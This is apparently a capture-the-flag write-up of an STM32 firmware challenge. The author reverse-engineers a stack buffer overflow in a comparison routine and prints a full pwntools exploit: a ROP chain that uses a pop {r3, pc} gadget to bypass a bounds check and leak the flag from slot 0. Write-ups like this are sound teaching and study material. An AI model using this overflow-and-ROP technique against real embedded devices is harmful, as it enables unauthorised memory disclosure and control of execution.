Level 9 - HWisntThatHardv2 (hardware pwn)

This challenge requires us to find a vulnerability in STM32 firmware, and exploit it to read the flag in memory. We are given an stm32 emulator to emulate the firmware since we do not have access to the physical hardware. To better understand the challenge structure, we need to look at the config file config.yaml
:
cpu:
svd: stm32f407.svd
vector_table: 0x08000000
regions:
- name: ROM
start: 0x08000000
load: csit_iot.bin
size: 0x80000
- name: RAM-CCM
start: 0x10000000
size: 0x18000
- name: RAM
start: 0x20000000
size: 0x20000
framebuffers:
peripherals:
devices:
spi_flash:
- peripheral: SPI3
jedec_id: 0xef4016
file: ext-flash.bin
size: 0x400000
usart_probe:
- peripheral: USART1
patches:
The firmware logic is in csit_iot.bin
which is loaded at address 0x08000000
, and an external SPI flash on SPI3.
If we look at ext-flash.bin
we see the following:

The first 32 bytes are the real flag we're interested in, and the rest of the data are fake flags. Including the credits there are 16 entries.
Let's look at the dockerfile:
FROM ubuntu
WORKDIR /tisc
RUN apt-get update && apt-get install -y socat
COPY csit_iot.bin .
COPY ext-flash.bin .
COPY stm32-emulator .
COPY stm32f407.svd .
COPY config.yaml .
ENTRYPOINT socat tcp-l:8000,fork,reuseaddr exec:"timeout 60s ./stm32-emulator config.yaml"
The stm32 emulator is run with the provided config file. When we try to see all options the stm32 emulator has we see the following:
STM32 Emulator
USAGE:
stm32-emulator [OPTIONS] <CONFIG>
ARGS:
<CONFIG> Config file
OPTIONS:
-b, --busy-loop-stop
Stop emulation when the program reaches a busy loop
-c, --color <COLOR>
Colorize output [default: auto] [possible values: auto, always, never]
-d, --dump-stack <DUMP_STACK>
Dump stack at the end. Parameter is the number of words to print
-h, --help
Print help information
-i, --interrupt-period <INTERRUPT_PERIOD>
Run pending interrupts every N instructions Shorter is more correct, but is slower
[default: 1]
-m, --max-instructions <MAX_INSTRUCTIONS>
Maximum number of instructions to execute
-s, --stop-addr <STOP_ADDR>
Stop emulation when pc reaches this address
-v, --verbose
Verbosity. Can be repeated. -vvvv is the maximum
However, when I tried using the different options they didn't seem to actually work. I later managed to find the stm32-emulator repo on GitHub, but it had not been configured to allow the user to enter input from stdin. In other words, both provided and sourced emulators didn't work perfectly. I decided to try reversing the binary first.
Using my IDA Pro MCP + GitHub Copilot, it gave me some understanding as to how the program worked, and I learnt that there were 2 main types of input it accepted, both in json:
View the 32 bytes at a certain slot from 1 to 15 inclusive. The request is of the format
{"slot":x} (reads slot x)
The response looks something like
Slot 1 contains: [84,73,83,67,123,70,65,75,69,95,70,76,65,71,95,71,79,69,83,95,72,69,82,69,125,0,0,0,0,0,0,0]
Find how many matches your provided array has with the slot. The request is something like:
{"slot":1,"data":[1,2,3,...]}
And the response is something like:
Checking..
Result: 1
Where 1 is the number of similarities we have with the slot data
On reversing the binary we identify a function main
at address 0x807900
, which calls a function parse_command
at address 0x8007260
.
main
then has the following pseudocode:
if ( valid_command )
{
v13 = slot_index;
if ( (unsigned int)(slot_index - 1) <= 0xE )// 1 <= index <= 15
{
memset_(rx_byte, 0, 32);
spi_cmd[0] = 3;
spi_cmd[1] = __rev16(32 * v13);
gpio_write_pin(1073872896, 0x8000, 0);
spi_tx(&g_spi, spi_cmd, 4, -1);
spi_rx(&g_spi, rx_byte, 32, -1);
gpio_write_pin(1073872896, 0x8000, 1);
if ( has_user_data )
{
check_data_and_format_result((int)rx_byte, &v41);
if ( v41 )
mem_free(v41, v42 - v41);
}
else
{
memcpy_(g_outbuf, (int)"Slot ", 5);
appended = sb_append_uint(g_outbuf, v13);
memcpy_(appended, (int)" contains: [", 12);
p_slot_bytes = &slot_bytes;
while ( 1 )
{
v26 = (unsigned __int8)*++p_slot_bytes;
sb_append_uint(g_outbuf, v26);
if ( p_slot_bytes == &slot_bytes_end )
break;
memcpy_(g_outbuf, (int)",", 1);
}
v27 = memcpy_(g_outbuf, (int)"]", 1);
v28 = (int (__fastcall *)(int, int))g_outbuf;
v29 = *(_BYTE **)((char *)&g_outbuf[31] + *(_DWORD *)(g_outbuf[0] - 12));
if ( !v29 )
_throw_bad_alloc((int)v27);
if ( v29[28] )
{
v5 = (unsigned __int8)v29[39];
}
else
{
sub_800B34A(v29);
v28 = sub_8006C44;
v34 = *(int (__fastcall **)(int, int))(*(_DWORD *)v29 + 24);
if ( v34 != sub_8006C44 )
v5 = v34((int)v29, 10);
}
v30 = uart_write_buf(g_outbuf, v5, (int)v28);
uart_write_cstr(v30, v31);
}
if ( line_buf != (char *)line_sso )
mem_free(line_buf, line_sso[0] + 1);
goto LABEL_28;
}
v19 = memcpy_(g_outbuf, (int)"Out of bounds!", 14);
As you can see, it ensures that the provided index is ≥ 1 and <= 15. So we can't directly read the flag at slot 0.
If there is user data we enter a function check_data_and_format_result
at 0x800023c
, otherwise we enter an else block which simply prints the 32 bytes of slot data.
Now let's look at check_data_and_format_result
:
int __fastcall check_data_and_format_result(int a1, _DWORD *a2)
{
int num_matches; // r5
_DWORD *v3; // r0
_BYTE *v4; // r6
_DWORD *v5; // r4
int v6; // r1
int v7; // r0
int (*v9)(); // r3
num_matches = j_comparison(a1, a2);
memcpy_(g_outbuf, "Result: ", 8);
v3 = (_DWORD *)sb_append_uint(g_outbuf, num_matches);
v4 = *(_BYTE **)((char *)v3 + *(_DWORD *)(*v3 - 12) + 124);
if ( !v4 )
_throw_bad_alloc(v3);
v5 = v3;
if ( v4[28] )
{
v6 = (unsigned __int8)v4[39];
}
else
{
sub_800B34A(v4);
v9 = *(int (**)())(*(_DWORD *)v4 + 24);
v6 = 10;
if ( v9 != sub_8006C44 )
v6 = ((int (__fastcall *)(_BYTE *, int))v9)(v4, 10);
}
v7 = uart_write_buf(v5, v6);
uart_write_cstr(v7);
return num_matches;
}
Let's look at the comparison functions:
int __fastcall j_comparison(_DWORD *a1, _DWORD *a2)
{
return comparison(a1, a2);
}
int __fastcall comparison(_DWORD *a1, _DWORD *a2)
{
int similarities; // r5
char *v4; // r0
char *v5; // r3
int v6; // r1
int v7; // t1
int v8; // t1
int *v9; // r0
int (__fastcall *v10)(int, int); // r2
_BYTE *v11; // r4
int v12; // r1
int *v13; // r0
int v14; // r1
int (__fastcall *v16)(int, int); // r3
char v17; // [sp+0h] [bp-31h] BYREF
int v18; // [sp+1h] [bp-30h] BYREF
char v19; // [sp+20h] [bp-11h] BYREF
memcpy_(&v18, *a2, a2[1] - *a2);
similarities = 0;
v4 = (char *)a1 - 1;
v5 = &v17;
// count number of array similarities
do
{
v7 = (unsigned __int8)*++v5;
v6 = v7;
v8 = (unsigned __int8)*++v4;
if ( v6 == v8 )
++similarities;
}
while ( &v19 != v5 );
v9 = memcpy_(g_outbuf, (int)"Checking... ", 12);
v11 = *(_BYTE **)((char *)&g_outbuf[31] + *(_DWORD *)(g_outbuf[0] - 12));
if ( !v11 )
_throw_bad_alloc((int)v9);
if ( v11[28] )
{
v12 = (unsigned __int8)v11[39];
}
else
{
sub_800B34A(v11);
v10 = sub_8006C44;
v16 = *(int (__fastcall **)(int, int))(*(_DWORD *)v11 + 24);
v12 = 10;
if ( v16 != sub_8006C44 )
v12 = v16((int)v11, 10);
}
v13 = uart_write_buf(g_outbuf, v12, (int)v10);
uart_write_cstr(v13, v14);
return similarities;
}
int __fastcall memcpy_(int result, char *a2, int a3)
{
char *v3; // r2
int i; // r3
char v5; // t1
v3 = &a2[a3];
for ( i = result - 1; a2 != v3; ++i )
{
v5 = *a2++;
*(_BYTE *)(i + 1) = v5;
}
return result;
}
At this point I tried fuzzing the program, and the first thing I tried was to provide a data array that was longer than 32 bytes. That actually caused the program to crash, which made me suspect that providing a long array actually resulted in a segfault somewhere in the program. I then asked ChatGPT to identify potential buffer overflow vulnerabilities in the program, and I learnt that the memcpy_
call in the comparison
function was vulnerable to a buffer overflow. This is because if the array has >32 bytes, memcpy_
copies more bytes into v18
in the comparison
function. We can see from the pseudocode that v18
is positioned at sp+1
. That is 1 byte after the stack pointer. Thus we are able to overflow into the saved pc
pointer / return address of comparison
, and control the program execution flow.
Let's look at the function cleanup in comparison
:
LDR R0, =g_outbuf
BL uart_write_buf
BL uart_write_cstr
MOV R0, R5
ADD SP, SP, #0x24 ; '$'
POP {R4,R5,PC}
Although the pseudocode shows that v18
is at sp+1
, I found out by trial and error that the data is actually copied to address sp
. Since the function calls adds 0x24 to SP then pops r4 then r5 when closing, this means that the padding between the memcpy target and PC is 0x24 + 2 * 4 = 44 bytes (2 * 4 because there are 2 registers being popped and each it 32 bits / 4 bytes long).
Therefore after writing 44 bytes into the array, the remaining content will overwrite saved PC.
Now, to get the flag we simply need to read slot 0. Let's see the relevant part of main
for reading slot data again:
v13 = slot_index;
if ( (unsigned int)(slot_index - 1) <= 0xE )// 1 <= index <= 15
{
memset_(rx_byte, 0, 32);
spi_cmd[0] = 3;
spi_cmd[1] = __rev16(32 * v13);
gpio_write_pin(1073872896, 0x8000, 0);
spi_tx(&g_spi, spi_cmd, 4, -1);
spi_rx(&g_spi, rx_byte, 32, -1);
gpio_write_pin(1073872896, 0x8000, 1);
if ( has_user_data )
{
check_data_and_format_result((int)rx_byte, &v41);
if ( v41 )
mem_free(v41, v42 - v41);
}
else
{
memcpy_(g_outbuf, (int)"Slot ", 5);
appended = sb_append_uint(g_outbuf, v13);
memcpy_(appended, (int)" contains: [", 12);
...
So our objective is to have slot_index = 0
and has_user_data = 0
.
How do we achieve slot_index = 0
? We can simply jump to the middle of the main function after the <= 0xE check is done, and set the value of the register containing slot_index
to 0 by performing Return Oriented Programming (ROP) to set register values. Let's look at the corresponding asm:
LDR R4, [SP,#0xA8+slot_index]
SUBS R3, R4, #1
CMP R3, #0xE <- comparison!
BHI.W loc_8007C20
if not out of bounds:
MOVS R2, #0x20 ; ' ' <- instruction at address 0x8007b14
MOVS R1, #0
ADD R0, SP, #0xA8+var_40
BL memset_
MOVS R1, #3
LSLS R3, R4, #5
REV16 R3, R3
STRH.W R1, [SP,#0xA8+var_8C]
LDR R0, =0x40020000
STRH.W R3, [SP,#0xA8+var_8A]
MOVS R2, #0
MOV.W R1, #0x8000
...
So we need to execute the instruction at address 0x8007b14
with R3 = 0. We can do this by looking for a pop {R3 , , ... PC} gadget. Note that in ARMTHUMB architecture we also need to perform a | 1
operation to every instruction address we specify.
I found a pop {R3, PC}
gadget at address 0x0801058e
.
The next problem: How do we set has_user_data = 0
? Well, has_user_data
is stored in the stack of the main
function at SP+0x5C
, so we can actually overwrite it with our array payload.
So the final ROP chain outline will be something like:
Return to
0x0801058f
to pop r3 and pcReturn to the middle of the
main
function at address0x8007b15
, and it now thinks our slot is 0 since r3 = 0.Overwrite the byte at address
sp+0x5C
with\x00
to sethas_user_data = 0
.
Below is my full exploit:
from pwn import *
import json
# Remote target runs the firmware and bridges UART over TCP
p = remote("chals.tisc25.ctf.sg", 51728)
context.log_level = 'debug'
pl = [0] * 32 # next 32 bits overwrite PC
pl += [0] * 4 # padding
# r4, r5, pc
pl += [0,0,0,0,0,0,0,0] # r4, r5
pl += [0x8f, 0x05, 0x01, 0x08] # pc (pop r3; pop pc gadget) at 0x0801058e
pl += [0, 0, 0, 0] # r3
pl += [0x15, 0x7b, 0x00, 0x08] # pc (0x8007b14, middle of main)
pl += [0] * 0x5c # padding before overwriting has_user_data
pl += [0]
data = {"slot": 1, "data": pl}
p.sendline(json.dumps(data).encode())
print(p.recvrepeat(1))
p.close() # TISC{3mul4t3d_uC_pwn3d}
# Slot 0 contains: [84,73,83,67,123,51,109,117,108,52,116,51,100,95,117,67,95,112,119,110,51,100,125,0,0,0,0,0,0,0,0,0]
Last updated